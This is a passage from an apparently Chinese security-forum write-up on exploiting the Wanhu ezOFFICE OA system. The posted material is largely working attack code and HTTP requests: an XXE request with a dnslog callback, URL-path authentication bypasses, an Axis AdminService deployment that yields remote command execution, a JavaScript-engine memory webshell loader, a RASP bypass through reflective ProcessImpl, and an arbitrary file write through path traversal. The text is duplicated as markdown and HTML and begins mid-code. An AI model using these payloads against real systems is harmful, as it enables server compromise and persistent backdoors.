java.lang.Class.forName("java.security.cert.Certificate"),
0
)
),
null,
classLoader,
[]
);
clz = unsafe.defineClass(
null,
bytes,
0,
bytes.length,
classLoader,
protectionDomain
);
}
} catch (error) {
error.printStackTrace();
} finally {
return clz;
}
}
function base64DecodeToByte(str) {
var bt;
try {
bt = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer(str);
} catch (e) {
bt = java.lang.Class.forName("java.util.Base64").newInstance().getDecoder().decode(str);
}
return bt;
}
clz = defineClass(base64DecodeToByte(code));
clz.newInstance();
```
由于JBoss 低版本套的是 tomcat所以直接使用 tomcat 内存马即可
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-87ab87fce34e7e41b93767a4a479fcbcd37b3f8a.png)
使用Listener组件容错高
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-c1ea2c55639e04a5643b94defd04fd15cadbae59.png)
执行,无报错并且返回 200说明成功了
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-24153a68c8d45034111bcc9bd3656df5280b0148.png)
随便找个路径连接即可
### RASP绕过
在命令执行的时候可能会遇到:**java.lang.SecurityException: cmd execute denied !!!**
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-4c237161525299a4b84664bcfc5e228953a77419.png)
即存在 RASP，而 RASP 一般是基于黑名单进行拦截的
这里禁用了ProcessBuilder我们尝试更底层的命令执行ProcessImpl该类是private所以只能反射调用
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-350f2ffdee079101528ae6f4106f34e2e2e5792b.png)
这里JDK1.6和JDK1.8的构造方法存在差异,所以需要小小修改一下
当调用setAccessible的时候会报错
```php
sun.org.mozilla.javascript.internal.EcmaError: TypeError: Cannot call method "setAccessible" of null
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-72f5ac149880b8a2ce93a7b044c47067ab32102c.png)
在js中无法反射调用根据网上的文章我们可以写class文件然后URLClassLoader去加载
```java
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.lang.reflect.Method;
import java.util.Map;
public class Testcmd {
String result = "";
public Testcmd(String paramString) throws Exception{
boolean isLinux = true;
String osTyp = System.getProperty("os.name");
if (osTyp != null &amp;amp;&amp;amp; osTyp.toLowerCase().contains("win")) {
isLinux = false;
}
String[] cmds = isLinux ? new String[]{"bash", "-c", paramString} : new String[]{"cmd.exe", "/c", paramString};
Class clazz = Class.forName("java.lang.ProcessImpl");
Method method = clazz.getDeclaredMethod("start", String[].class, Map.class,String.class,boolean.class);
method.setAccessible(true);
InputStream ins = ((Process) method.invoke(null,cmds,null,null,true)).getInputStream();
ByteArrayOutputStream bos = new ByteArrayOutputStream();
byte[] bytes = new byte[1024];
int size;
while((size = ins.read(bytes)) &amp;gt; 0)
bos.write(bytes,0,size);
ins.close();
this.result = bos.toString();
}
public java.lang.String toString() {
return this.result;
}
public static void main(String[] args) {
}
}
```
没有ban掉File类可以将class文件写入到系统中
```java
try {
load("nashorn:Moziilla_compat.js");
} catch (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.sun.misc);
var file = new File("../server/Testcmd.class");
var fos = new FileOutputStream(file);
var base64Decoder = new BASE64Decoder();
var decodeContent = base64Decoder.decodeBuffer("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");
fos.write(decodeContent, new Integer(0), new Integer(decodeContent.length));
fos.close();
```
最后就是网上公开的poc了
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-f4332d108c30507b1bfcbddd2005290a822b0cbf.png)
### StringUtil任意文件写
网上还存在一种方法:使用`com.whir.ezoffice.ezform.util.StringUtil`这个类写文件
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-fc12c86d40e331cd3ebfb1b6fca156c6ce9e0d9b.png)
该类存在无参构造方法，满足 Axis 部署为 service 的条件
```java
/**
 * Appends {@code content} to the file at {@code fileName}, creating any
 * missing parent directories first.
 *
 * Security note: {@code fileName} is used as-is -- no canonicalisation and
 * no base-directory restriction, so "../" segments are honoured -- and the
 * public wrappers below hand their arguments straight through. Once the
 * class is reachable as a web-service endpoint (as the article shows), this
 * is an unauthenticated arbitrary file write.
 *
 * @param fileName target path; the part before the last '/' is created with mkdirs()
 * @param content  text appended verbatim, in the platform default charset
 * @throws IOException if the directory cannot be created or the write fails
 */
private static void writeToFile(String fileName, String content) throws IOException {
BufferedOutputStream outStream = null;
OutputStreamWriter writer = null;
try {
// Directory part = everything before the last '/'. A bare file name
// yields "" -- NOTE(review): new File("") is the empty abstract pathname,
// whose exists() is false, so such calls likely fail below; confirm.
String dirPath = "";
if (fileName.lastIndexOf("/") != -1) {
dirPath = fileName.substring(0, fileName.lastIndexOf("/"));
}
File dir = new File(dirPath);
if (!dir.exists() &amp;amp;&amp;amp; !dir.mkdirs()) {
throw new IOException("create directory '" + dirPath + "' failed!");
}
// Append mode: repeated calls accumulate rather than overwrite.
outStream = new BufferedOutputStream(new FileOutputStream(fileName, true));
writer = new OutputStreamWriter(outStream);
writer.write(content);
} catch (IOException var9) {
throw var9;
} finally {
// Closing the writer flushes and closes the underlying stream; the
// second close() is redundant but harmless.
if (writer != null) {
writer.close();
}
if (outStream != null) {
outStream.close();
}
}
}
/**
 * Public entry point: appends {@code content} to {@code fileName} with no
 * trailing newline. Neither argument is validated here; both go to
 * writeToFile unchanged.
 *
 * @param fileName target path, passed through as-is
 * @param content  text to append
 * @throws IOException propagated from writeToFile
 */
public static void printToFile(String fileName, String content) throws IOException {
writeToFile(fileName, content);
}
/**
 * Public entry point: appends {@code content} plus a "\n" to
 * {@code fileName}. Like printToFile, it validates neither argument.
 *
 * @param fileName target path, passed through as-is
 * @param content  text to append; a newline is added after it
 * @throws IOException propagated from writeToFile
 */
public static void printlnToFile(String fileName, String content) throws IOException {
writeToFile(fileName, content + "\n");
}
```
可以通过 printToFile 方法任意文件写：fileName 未做路径规范化和目录限制，content 以追加方式原样写入，二者均由调用方控制
```php
http://127.0.0.1:{{port}}/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns=%22http://xml.apache.org/axis/wsdd/%22%20xmlns:java=%22http://xml.apache.org/axis/wsdd/providers/java%22%3E%3Cservice%20name=%22freemarkerQa%22%20provider=%22java:RPC%22%3E%3Cparameter%20name=%22className%22%20value=%22com.whir.ezoffice.ezform.util.StringUtil%22/%3E%3Cparameter%20name=%22allowedMethods%22%20value=%22*%22/%3E%3C/service%3E%3C/deployment
```
网上众多的 freemarkerQa 服务均是调用的该类
```php
POST /defaultroot/./services/freemarkerQa HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Content-Length: 606
&lt;soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:util="http://util.ezform.ezoffice.whir.com"&gt;
&lt;soapenv:Body&gt;
&lt;util:printToFile soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"&gt;
&lt;fileName xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"&gt;../server/oa/deploy/defaultroot.war/1.txt&lt;/fileName&gt;
&lt;content xsi:type="soapenc:string"&gt;x&lt;/content&gt;
&lt;/util:printToFile&gt;
&lt;/soapenv:Body&gt;
&lt;/soapenv:Envelope&gt;
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-2f970068174235f1ffd981ed0d0d245886092c89.png)
验证成功
总结
--
实战中很有意思的一个漏洞但网上的poc。。。呃呃
还可以尝试打freemarker、bsh
万户作为老牌oa还是很值得去学习研究的
参考:
[万户rce](https://mp.weixin.qq.com/s/sktnBnCrZUoqkhGM0O9HRQ)
[实战 | 万户GeneralWeb组合Bypass Rasp](https://mp.weixin.qq.com/s/4FyX_zmY90yGLzdJgUGzcg)</textarea>
<div id=layer-photos-demo>
<div id=md_view><div class=markdown-body><p blockindex=0><img src=data:image/png;base64,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
之前实战遇到了但是网上的poc懂得都懂索性就专门研究一下</p>
<p blockindex=1>JDK版本1.6.0<br>
操作系统Windows Server 2012</p>
<h2 blockindex=2>漏洞分析</h2>
<p blockindex=3>从web.xml看起</p>
<p blockindex=4><img src="data:image/png;base64,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
<p blockindex=5>使用了 XFire 与 Axis 两种 WebService 框架</p>
<p blockindex=6>看到 XFire 配置文件<code>D:/jboss/jboss-as/server/oa/deploy/defaultroot.war/WEB-INF/classes/META-INF/xfire/services.xml</code></p>
<p blockindex=7><img src=data:image/png;base64,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
<p blockindex=8>配置了一个GeneralWeb的服务找到该类<code>com.whir.service.webservice.GeneralWeb</code></p>
<pre blockindex=9><code class="hljs language-java"><span class=hljs-keyword>package</span> com.whir.service.webservice;
<span class=hljs-keyword>import</span> com.whir.service.common.CallApi;
<span class=hljs-keyword>public</span> <span class=hljs-class><span class=hljs-keyword>class</span> <span class=hljs-title>GeneralWeb</span> </span>{
<span class=hljs-function><span class=hljs-keyword>public</span> String <span class=hljs-title>OAManager</span><span class=hljs-params>(String input)</span> <span class=hljs-keyword>throws</span> Exception </span>{
CallApi callapi = <span class=hljs-keyword>new</span> CallApi();
<span class=hljs-keyword>return</span> callapi.getResult(input);
}
}
</code></pre>
<p blockindex=10><code>com.whir.service.common.CallApi#getResult</code></p>
<pre blockindex=11><code class="hljs language-java"><span class=hljs-function><span class=hljs-keyword>public</span> String <span class=hljs-title>getResult</span><span class=hljs-params>(String input)</span> <span class=hljs-keyword>throws</span> Exception </span>{
<span class=hljs-keyword>if</span> (serviceMap == <span class=hljs-keyword>null</span>) {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> Exception(<span class=hljs-string>"Error: serviceMap can not is null"</span>);
}
SAXBuilder builder = <span class=hljs-keyword>new</span> SAXBuilder();
<span class=hljs-keyword>byte</span>[] b = input.getBytes(<span class=hljs-string>"utf-8"</span>);
InputStream is = <span class=hljs-keyword>new</span> ByteArrayInputStream(b);
Document doc = builder.build(is);
Element root = doc.getRootElement();
</code></pre>
<p blockindex=12>使用默认配置的 SAXBuilder 进行解析，未禁用 DOCTYPE/外部实体，也未对输入做任何过滤，因此产生 XXE 漏洞</p>
<p blockindex=13>鉴权方面代码在<code>com.whir.common.util.SetCharacterEncodingFilter</code></p>
<p blockindex=14><img src="data:image/png;base64,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
<p blockindex=15>使用的是 getRequestURI那么就有很多绕过方法了简单列举几个</p>
<pre blockindex=16><code class="hljs language-php">/iWebOfficeSign/OfficeServer.jsp/../../
/xfservices/./GeneralWeb
.jsp;.js
</code></pre>
<h2 blockindex=17>漏洞利用</h2>
<p blockindex=18>触发dnslog</p>
<pre blockindex=19><code class="hljs language-php">POST /defaultroot/xfservices/./GeneralWeb HTTP/<span class=hljs-number>1.1</span>
Host:
User-Agent: Moziilla/<span class=hljs-number>5.0</span> (Linux; U; Android <span class=hljs-number>2.3</span>.<span class=hljs-number>6</span>; en-us; Nexus S Build/GRK39F) AppleWebKit/<span class=hljs-number>533.1</span> (KHTML, like Gecko) Version/<span class=hljs-number>4.0</span> Mobile Safari/<span class=hljs-number>533.1</span>
Content-Type: text/xml;charset=UTF-<span class=hljs-number>8</span>
SOAPAction:
Content-Length: <span class=hljs-number>457</span>
&lt;soapenv:Envelope xmlns:soapenv=<span class=hljs-string>"http://schemas.xmlsoap.org/soap/envelope/"</span> xmlns:gen=<span class=hljs-string>"http://com.whir.service/GeneralWeb"</span>&gt;
&lt;soapenv:Body&gt;
&lt;gen:OAManager&gt;
&lt;gen:input&gt;
&amp;lt;?xml version=<span class=hljs-string>"1.0"</span> encoding=<span class=hljs-string>"UTF-8"</span>?&amp;gt;
&amp;lt;!DOCTYPE root [
&amp;lt;!ENTITY x SYSTEM <span class=hljs-string>"http://123.6x9ryk.dnslog.cn"</span>&amp;gt;]&amp;gt;
&amp;lt;root&amp;gt;&amp;amp;x;&amp;lt;/root&amp;gt;
&lt;/gen:input&gt;
&lt;/gen:OAManager&gt;
&lt;/soapenv:Body&gt;
&lt;/soapenv:Envelope&gt;
</code></pre>
<p blockindex=20>因为使用了 Axis，我们可以通过 AdminServlet 创建任意服务，看 server-config.wsdd 中的配置：</p>
<pre blockindex=21><code class="hljs language-xml"><span class=hljs-tag>&lt;<span class=hljs-name>service</span> <span class=hljs-attr>name</span>=<span class=hljs-string>"AdminService"</span> <span class=hljs-attr>provider</span>=<span class=hljs-string>"java:MSG"</span>&gt;</span>
<span class=hljs-tag>&lt;<span class=hljs-name>parameter</span> <span class=hljs-attr>name</span>=<span class=hljs-string>"allowedMethods"</span> <span class=hljs-attr>value</span>=<span class=hljs-string>"AdminService"</span>/&gt;</span>
<span class=hljs-tag>&lt;<span class=hljs-name>parameter</span> <span class=hljs-attr>name</span>=<span class=hljs-string>"enableRemoteAdmin"</span> <span class=hljs-attr>value</span>=<span class=hljs-string>"false"</span>/&gt;</span>
<span class=hljs-tag>&lt;<span class=hljs-name>parameter</span> <span class=hljs-attr>name</span>=<span class=hljs-string>"className"</span> <span class=hljs-attr>value</span>=<span class=hljs-string>"org.apache.axis.utils.Admin"</span>/&gt;</span>
<span class=hljs-tag>&lt;<span class=hljs-name>namespace</span>&gt;</span>http://xml.apache.org/axis/wsdd/<span class=hljs-tag>&lt;/<span class=hljs-name>namespace</span>&gt;</span>
<span class=hljs-tag>&lt;/<span class=hljs-name>service</span>&gt;</span>
</code></pre>
<p blockindex=22>那么思路就很清晰了：AdminService 配置了 enableRemoteAdmin=false，只接受来自本机的请求，因此借助 XXE 发起本地 GET 请求来部署恶意服务；由于 JDK 是低版本，可以部署 RhinoScriptEngineService</p>
<pre blockindex=23><code class="hljs language-xml">http://127.0.0.1:{{Port}}/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22RhinoScriptEngineService%22%20provider%3D%22java%3ARPC%22%3E%3Cparameter%20name%3D%22className%22%20value%3D%22com.sun.script.javascript.RhinoScriptEngine%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22eval%22%20%2F%3E%3CtypeMapping%20deserializer%3D%22org.apache.axis.encoding.ser.BeanDeserializerFactory%22%20type%3D%22java%3Ajavax.script.SimpleScriptContext%22%20qname%3D%22ns%3ASimpleScriptContext%22%20serializer%3D%22org.apache.axis.encoding.ser.BeanSerializerFactory%22%20xmlns%3Ans%3D%22urn%3Abeanservice%22%20regenerateElement%3D%22false%22%3E%3C%2FtypeMapping%3E%3C%2Fservice%3E%3C%2Fdeployment
</code></pre>
<p blockindex=24><img src="data:image/png;base64,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
<p blockindex=25>部署成功</p>
<pre blockindex=26><code class="hljs language-php">POST /defaultroot/services/./RhinoScriptEngineService HTTP/<span class=hljs-number>1.1</span>
Host:
User-Agent: Moziilla/<span class=hljs-number>5.0</span> (Linux; U; Android <span class=hljs-number>2.3</span>.<span class=hljs-number>6</span>; en-us; Nexus S Build/GRK39F) AppleWebKit/<span class=hljs-number>533.1</span> (KHTML, like Gecko) Version/<span class=hljs-number>4.0</span> Mobile Safari/<span class=hljs-number>533.1</span>
Content-Type: text/xml;charset=UTF-<span class=hljs-number>8</span>
SOAPAction:
Content-Length: <span class=hljs-number>973</span>
&lt;soapenv:Envelope xmlns:xsi=<span class=hljs-string>"http://www.w3.org/2001/XMLSchema-instance"</span> xmlns:xsd=<span class=hljs-string>"http://www.w3.org/2001/XMLSchema"</span> xmlns:soapenv=<span class=hljs-string>"http://schemas.xmlsoap.org/soap/envelope/"</span> xmlns:jav=<span class=hljs-string>"http://javascript.script.sun.com"</span>&gt;
&lt;soapenv:Body&gt;
&lt;<span class=hljs-keyword>eval</span> xmlns=<span class=hljs-string>"http://127.0.0.1:8080/services/scriptEngine"</span>&gt;
&lt;arg0 xmlns=<span class=hljs-string>""</span>&gt;
&lt;![CDATA[
<span class=hljs-keyword>try</span> {
load(<span class=hljs-string>"nashorn:Moziilla_compat.js"</span>);
} <span class=hljs-keyword>catch</span> (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.java.util);
<span class=hljs-keyword>var</span> command = <span class=hljs-string>"cmd /c whoami"</span>;
<span class=hljs-keyword>var</span> pb = <span class=hljs-keyword>new</span> java.lang.ProcessBuilder(Arrays.asList(command.split(<span class=hljs-string>" "</span>)));
<span class=hljs-keyword>var</span> process = pb.start();
<span class=hljs-keyword>var</span> ret = <span class=hljs-keyword>new</span> java.util.Scanner(process.getInputStream()).useDelimiter(<span class=hljs-string>'\\A'</span>).next();
ret;
]]&gt;
&lt;/arg0&gt;
&lt;arg1 xmlns=<span class=hljs-string>""</span> xsi:type=<span class=hljs-string>"urn:SimpleScriptContext"</span> xmlns:urn=<span class=hljs-string>"urn:beanservice"</span>&gt;
&lt;/arg1&gt;
&lt;/<span class=hljs-keyword>eval</span>&gt;
&lt;/soapenv:Body&gt;
&lt;/soapenv:Envelope&gt;
</code></pre>
<p blockindex=27><img src=data:image/png;base64,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
<p blockindex=28>成功执行命令</p>
<h3 blockindex=29>内存马</h3>
<p blockindex=30>Java-Js-Engine-Payloads<a href=https://github.com/yzddmr6/Java-Js-Engine-Payloads>https://github.com/yzddmr6/Java-Js-Engine-Payloads</a></p>
<p blockindex=31>适配了JDK6-14的内存马</p>
<pre blockindex=32><code class="hljs language-java"><span class=hljs-keyword>try</span> {
load(<span class=hljs-string>"nashorn:mozilla_compat.js"</span>);
} <span class=hljs-keyword>catch</span> (e) {
}
<span class=hljs-function>function <span class=hljs-title>getUnsafe</span><span class=hljs-params>()</span> </span>{
<span class=hljs-keyword>var</span> theUnsafeMethod =
java.lang.Class.forName(<span class=hljs-string>"sun.misc.Unsafe"</span>).getDeclaredField(<span class=hljs-string>"theUnsafe"</span>);
theUnsafeMethod.setAccessible(<span class=hljs-keyword>true</span>);
<span class=hljs-keyword>return</span> theUnsafeMethod.get(<span class=hljs-keyword>null</span>);
}
<span class=hljs-function>function <span class=hljs-title>removeClassCache</span><span class=hljs-params>(clazz)</span> </span>{
<span class=hljs-keyword>var</span> unsafe = getUnsafe();
<span class=hljs-keyword>var</span> clazzAnonymousClass = unsafe.defineAnonymousClass(
clazz,
java.lang.Class.forName(<span class=hljs-string>"java.lang.Class"</span>)
.getResourceAsStream(<span class=hljs-string>"Class.class"</span>)
.readAllBytes(),
<span class=hljs-keyword>null</span>
);
<span class=hljs-keyword>var</span> reflectionDataField =
clazzAnonymousClass.getDeclaredField(<span class=hljs-string>"reflectionData"</span>);
unsafe.putObject(clazz, unsafe.objectFieldOffset(reflectionDataField), <span class=hljs-keyword>null</span>);
}
<span class=hljs-function>function <span class=hljs-title>bypassReflectionFilter</span><span class=hljs-params>()</span> </span>{
<span class=hljs-keyword>var</span> reflectionClass;
<span class=hljs-keyword>try</span> {
reflectionClass = java.lang.Class.forName(
<span class=hljs-string>"jdk.internal.reflect.Reflection"</span>
);
} <span class=hljs-keyword>catch</span> (error) {
reflectionClass = java.lang.Class.forName(<span class=hljs-string>"sun.reflect.Reflection"</span>);
}
<span class=hljs-keyword>var</span> unsafe = getUnsafe();
<span class=hljs-keyword>var</span> classBuffer = reflectionClass
.getResourceAsStream(<span class=hljs-string>"Reflection.class"</span>)
.readAllBytes();
<span class=hljs-keyword>var</span> reflectionAnonymousClass = unsafe.defineAnonymousClass(
reflectionClass,
classBuffer,
<span class=hljs-keyword>null</span>
);
<span class=hljs-keyword>var</span> fieldFilterMapField =
reflectionAnonymousClass.getDeclaredField(<span class=hljs-string>"fieldFilterMap"</span>);
<span class=hljs-keyword>var</span> methodFilterMapField =
reflectionAnonymousClass.getDeclaredField(<span class=hljs-string>"methodFilterMap"</span>);
<span class=hljs-keyword>if</span> (
fieldFilterMapField
.getType()
.isAssignableFrom(java.lang.Class.forName(<span class=hljs-string>"java.util.HashMap"</span>))
) {
unsafe.putObject(
reflectionClass,
unsafe.staticFieldOffset(fieldFilterMapField),
java.lang.Class.forName(<span class=hljs-string>"java.util.HashMap"</span>)
.getConstructor()
.newInstance()
);
}
<span class=hljs-keyword>if</span> (
methodFilterMapField
.getType()
.isAssignableFrom(java.lang.Class.forName(<span class=hljs-string>"java.util.HashMap"</span>))
) {
unsafe.putObject(
reflectionClass,
unsafe.staticFieldOffset(methodFilterMapField),
java.lang.Class.forName(<span class=hljs-string>"java.util.HashMap"</span>)
.getConstructor()
.newInstance()
);
}
removeClassCache(java.lang.Class.forName(<span class=hljs-string>"java.lang.Class"</span>));
}
<span class=hljs-function>function <span class=hljs-title>setAccessible</span><span class=hljs-params>(accessibleObject)</span> </span>{
<span class=hljs-keyword>var</span> unsafe = getUnsafe();
<span class=hljs-keyword>var</span> overrideField = java.lang.Class.forName(
<span class=hljs-string>"java.lang.reflect.AccessibleObject"</span>
).getDeclaredField(<span class=hljs-string>"override"</span>);
<span class=hljs-keyword>var</span> offset = unsafe.objectFieldOffset(overrideField);
unsafe.putBoolean(accessibleObject, offset, <span class=hljs-keyword>true</span>);
}
// Loads raw class-file bytes into a brand-new, empty URLClassLoader and returns the
// resulting java.lang.Class, or null if anything failed (see catch/finally at the end).
// bytes: a Java byte[] holding the class file (produced by base64DecodeToByte below).
// Two strategies, chosen by the first component of the java.version property:
//   - "11" and later: clear the reflection filter, make ClassLoader.defineClass
//     accessible via the Unsafe-backed setAccessible() above, invoke it reflectively;
//   - older JDKs: call sun.misc.Unsafe.defineClass directly with a ProtectionDomain
//     (presumably because that Unsafe method is not available on newer JDKs).
// NOTE(review): the comparison in the if below is shown HTML-escaped in this capture;
// it is a plain greater-or-equal. For "1.8.0_xxx" the first component is "1", for
// "11.0.x" it is "11", so the engine's numeric coercion selects the intended branch.
